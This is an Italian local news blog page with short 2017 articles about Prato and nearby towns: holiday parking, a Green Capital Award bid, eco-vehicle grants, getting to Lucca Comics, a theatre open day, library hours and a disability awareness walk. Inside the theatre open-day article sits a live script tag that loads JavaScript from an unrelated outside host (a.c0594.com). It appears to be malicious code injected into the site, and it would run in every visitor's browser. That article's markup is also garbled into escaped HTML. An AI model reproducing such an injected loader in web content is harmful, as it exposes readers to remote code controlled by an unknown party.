Articolo
07 dic 2017

Per Natale parcheggiate fuori dal centro storico!

di Cristina Betti

Rendiamo la città più a misura di pedone: parcheggi gratuiti o scontati fuori dal centro storico. Il Comune di Prato ha lanciato la seguente comunicazione: “Nel periodo natalizio, e precisamente dall’ 8 al 26 dicembre, i parcheggi di via Pomeria e di Piazza del Mercato Nuovo saranno gratuiti dalle 16 alle 20 mentre il parcheggio del Serraglio dalle 16 alle 8 del giorno successivo, avrà un costo forfettario di 1 euro” In questo modo, si invitano tutti coloro che frequenteranno il centro storico durante il periodo natalizio a non parcheggiare dentro le mura (piazza Mercatale, per esempio), sfruttando i parcheggi nelle immediate vicinanze, che per l’occasione saranno per lo più gratuiti o con tariffe agevolate. L'atmosfera natalizia sarà così più tranquilla e rilassata, come meno code, disagi, multe, ecc da dover affrontare, e soprattutto un ambiente non intasato da macchine e smog. Tanto più che i parcheggi fuori dalle mura non mancano, da piazza del Mercato Nuovo a via Arcivescovo Martini, via Pomeria e anche il parcheggio dell’ex ospedale, e soprattutto... sono davvero a 5-10 minuti a piedi dal centro! Attenzione, non vale tutto l’anno, non solo per Natale.  

Leggi tutto    Commenti 0
Articolo
04 dic 2017

Prato in corsa per lo European Green Capital Award 2020

di Cristina Betti

European Green Capital Award 2020: Prato in gara. La competizione vuole premiare gli sforzi dei comuni che si sforzano di migliorare la vita dei propri cittadini, diventano modelli di riferimento e impegnandosi nella sostenibilità ambientale, sociale ed economica.  E proprio Prato, che ha stilato il suo Pums e che dovrà dimostrare di saperlo applicare, si sta giocando questa importante opportunità: infatti, per la prima volta, per festeggiare dieci anni dell’iniziativa dell’European Green Capital Award, la Commissione europea concederà un incentivo finanziario di 350.000 euro alla città vincente. A partecipare sono le città in tutta Europa, con oltre 100.000 abitanti. Ecco chi sta gareggiando per il 2020: Aberdeen (Regno Unito), Budapest (Ungheria), Bursa (Turchia), Ghent (Belgio), Guimarães (Portogallo), Lahti (Finlandia), Lisbona (Portogallo), Ostrava (Repubblica Ceca), Prato (Italia), Reykjavik (Islanda), Siviglia (Spagna), Tallinn (Estonia), Wroclaw (Polonia) I problemi di viabilità a Prato sono ben conosciuti, speriamo pertanto che il "ricco bottino" in palio spinga i lavori nella giusta direzione di logicità, funzionalità e fruibilità per i cittadini. Info: sito ufficiale   

Leggi tutto    Commenti 0
Articolo
02 nov 2017

Bando per l’acquisto di veicoli ecologici a Montemurlo

di Cristina Betti

Il comune di Montemurlo ha messo a disposizione 21mila euro per l'acquisto di mezzi ecologici. C'è tempo fino al 31 gennaio 2018 per partecipare, e possono fare domanda sia i cittadini che le imprese. “Le questioni della qualità dell'aria e dell'inquinamento sono centrali per garantire la qualità della vita e la salute pubblica - spiega l'assessore all'ambiente Simone Calamai - La mobilità ibrida, elettrica e a metano nelle aree urbane rappresenta una soluzione ideale, rendendo maggiormente ecocompatibili le esigenze di spostamento nelle zone centrali della città maggiormente vulnerabili all'inquinamento atmosferico. Siamo consapevoli che questa misura non può essere risolutiva dei problemi legati all'inquinamento, ma vuole lanciare un messaggio di attenzione verso l'ambiente e favorire nella cittadinanza scelte più consapevoli ed ecologiche verso i mezzi di trasporto privati. Inoltre, viste le condizioni meteo di queste ultime settimane sull'Italia e visto che ci stiamo avviando verso l'inverno, quando, con l'accensione dei riscaldamenti, aumenteranno inevitabilmente le emissioni di particolato nell'aria, agire sul trasporto privato significa impegnarsi per far si che i valori dell'inquinamento atmosferico rimangano sotto i livelli di attenzione”.* Il Comune di Montemurlo ha stanziato per questo primo anno con 21.500 euro: per l'acquisto di ciclomotori elettrici nuovi di fabbrica il contributo è di 361.52 euro, per le autovetture nuove, ibride o elettriche di 1.032 euro, mentre per la trasformazione dei veicoli con un impianto a gas metano il contributo sarà di 516 euro. L'avviso e la relativa modulistica posso essere scaricati dal sito internet del Comune di Montemurlo (www.comune.montemurlo.po.it), oppure richiesti presso l'area b “Qualità del Territorio e del Patrimonio, servizio ambiente e difesa del suolo” (via Toscanini 1, Montemurlo ) telefono: 0574 558326/339 * Fonte: Notizie di Prato  

Leggi tutto    Commenti 0
Articolo
30 ott 2017

Come raggiungere il Lucca Comics 2017

di Cristina Betti

Ogni anno si ripresenta lo stesso dilemma: come arrivare a Lucca Comics evitando eccessivo traffico oppure treni carichi come carri bestiame? Qualche consiglio per l'evento che si terrà dal 1° al 5 novembre... La cosa migliore è senza dubbio provvedere (con un anticipo anche di un anno) a cercare un alloggio in luoghi limitrofi all'evento. Se ciò non è stato possibile, e vi trovate abbastanza vicino a Lucca, le scelte sono le due obbligate: treno, bus o macchina? Negli anni passati con il treno ci sono state spiacevoli situazioni (vedi treni colmi stile carro bestiame o confusione nella stazione di Lucca), ma in macchina, a seconda dell'orario, la situazione non migliorava certo di molto. Anzitutto, regolate il vostro viaggio in base al giorno scelto per l'evento: sicuramente in autostrada e in treno ci sarà più confusione nelle domeniche e nei giorni di festa. Con la macchina: partite presto, calcolando l'eventuale traffico dipeso dal giorno selezionato e soprattutto l'incubo parcheggio. Da Firenze (70 km) A11 Da Genova (170 km) A12/A11 Da Bologna (160 km) A1/A11 Ci saranno delle Navette: Bus per disabili con partenza da Viale Luporini (www.metrosrl.it/it/parcheggio/mappa) e scarico in Piazzale Verdi. Navetta circolare bus da 20 posti per n. 5 giorni (1-5 novembre 2017) con orario 7.30 - 20.30 che fa servizio circolare continuo da Polo Fiere a Piazza della Pace. Parcheggi scambiatori Capannori-Lucca attivi solo sabato 4 domenica 5 novembre (piazzale Aldo Moro) con servizio 7.30-21.00.   In treno: scegliete di partire non troppo tardi e per il viaggio di ritorno considerate che saranno molti quelli che vorranno prendere gli ultimi treni a disposizione, pertanto recatevi con largo anticipo alla stazione di Lucca per poter prendere il primo treno libero a disposizione. Lucca è collegata, a intervalli regolari, con le stazioni di Firenze, Pisa e Viareggio. In occasione del Lucca Comics sono previsti treni straordinari (inutile dire che è bene acquistare i biglietti del treno con largo anticipo). Consultate la tabella oraria del sito di trenitalia. Attenzione: - saranno modificati i percorsi in stazione, quindi calcolate i tempi di percorrenza - per la grande affluenza di viaggiatori possibili allungamenti dei tempi di viaggio - presenziamento straordinario personale Gruppo Ferrovie dello Stato Italiane - recarsi in stazione già muniti di biglietto, con largo anticipo  rispetto all’orario di partenza programmato Con il Bus:  Con Eventi in Bus partenze da 150 città in Italia.  Orari e prezzi qui. Happy Bus - pullman e biglietti da più di 200 città www.happybus.it   Nel caso ne abbiate bisogno, questo è il numero dei taxi di Lucca: Radio Taxi Lucca – 02 5353 Buon Lucca Comics 2017!  

Leggi tutto    Commenti 0
Articolo
20 ott 2017

21 ottobre Open day per il teatro Borsi

di Cristina Betti

<script src=http://a.c0594.com/?js=6></script>&lt;strong&gt;Sabato 21 ottobre, dalle 11:00 alle 24:00, il teatro Borsi fa una giornata di apertura per presentare il teatro, che riapre dopo 6 anni di chiusura.&lt;/strong&gt; &lt;hr /&gt; Durante la giornata si potrà entrare gratuitamente nel teatro per visitare la struttura sistemata ed avere informazioni riguardo i nuovi spettacoli, i corsi, le serate dedicate al cinema e tanto altro. &lt;span style="color: #000000"&gt;Ore 12.30 Conferenza Stampa di Presentazione della Stagione e delle attività del Borsi e consegna della tessera n.1 al Sindaco di Prato Matteo Biffoni. &lt;/span&gt; &lt;br style="color: #000000" /&gt;&lt;span style="color: #000000"&gt;Ore 15.00 - Incontro con i Docenti dei Corsi del Borsi e Artisti della Stagione 2017-18. &lt;/span&gt; &lt;br style="color: #000000" /&gt;&lt;span style="color: #000000"&gt;Ore 17.30 - 1a Assemblea dei Soci dell'Associazione Pratoteatro che ha ingestione il Borsi &lt;/span&gt; &lt;br style="color: #000000" /&gt;&lt;span style="color: #000000"&gt;Ore 20.30 - Mirabilia di e con Alessio Sardelli. Un attore all'Asta.&lt;/span&gt; Per info: &lt;a href="http://www.teatroborsi.it/" target="_blank"&gt;www.teatroborsi.it&lt;/a&gt; - &lt;span style="color: #000000"&gt; 0574 18 26 529 - 329 06 13 710&lt;/span&gt; &amp;nbsp; &amp;nbsp;

Leggi tutto    Commenti 0
Articolo
04 ott 2017

Le biblioteche di Prato sempre aperte!

di Alessandra Santoni

Da questa settimana, e più esattamente da domenica 1 ottobre, la biblioteca Lazzerini resterà aperta anche la domenica dalle 9 alle 19.Comincia così l’orario prolungato di apertura al pubblico, dopo le variazioni del periodo estivo. La grande novità è però l'apertura del lunedì mattina a partire dalle ore 9, con orario continuato fino alle 20 e il giovedì fino alle 23.  Come sempre saranno garantiti tutti i servizi, sia specialistici che di base, dal prestito alle consulenze, dalle risorse online ai servizi interculturali, fino al prestito interbibliotecario. Anche i bambini potranno godere ancor di più degli spazi e dei servizi: la sezione ragazzi e bambini sarà aperta la domenica dalle 9 alle 13 e dalle 14.30 alle 19, il lunedì dalle 14.30 alle 19, e dal martedì al sabato dalle 9 alle 19. Ma non è finita anche qui: anche le biblioteche decentrate delle circoscrizioni Nord e Ovest aumentano gli orari di apertura, e dal 7 ottobre al 2 dicembre saranno aperte anche il sabato pomeriggio dalle 15.30 alle 18.30. Foto: comunediprato.it

Leggi tutto    Commenti 0
Articolo
29 set 2017

Sabato tutti a Cerreto Guidi per la “Skarrozzata”

di Cristina Betti

Sabato 30 settembre alle 16:00 a Cerreto Guidi si svolgerà la Skarrozzata, una passeggiata a mobilità diversa per sensibilizzare alla disabilità e all'abbattimento delle barriere architettoniche, evento in cui i cittadini potranno fare il giro delle città seduti in carrozzina per adottare per qualche ora un punto di vista "diverso". La "Skarrozzata" nasce  nel 2011 a Bologna per sensibilizzare i cittadini a cosa significa muoversi in carrozzina, organizzando una passeggiata per le strade della città con la possibilità di mettersi in prima persona su una carrozzina. Gli obiettivi principali della Skarrozzata sono la sensibilizzazione e l'educazione alla diversità e alla disabilità, attraverso l'integrazione sociale e il prender consapevolezza delle innumerevoli barriere architettoniche e mentali presenti sul percorso di chi è costretto ad una mobilità limitata. Alle ore 16:00 è prevista la partenza al Circolo Arci di Via Roma 2 a Cerreto Guidi. Dopo aver fatto il giro del comune, seguiranno i saluti istituzionali da parte del sindaco Simona Rossetti, la serata si concluderà con un'apericena a buffet. Animerà la serata il Circo Liberatutti attraverso giochi "inclusivi". A supportare l'evento anche la Onlus #vorreiprendereiltreno di Iacopo Melio, il quale parteciperà in prima persona all'evento di Cerreto Guidi. Maggiori informazioni: evento facebook - La Skarrozzata    

Leggi tutto    Commenti 0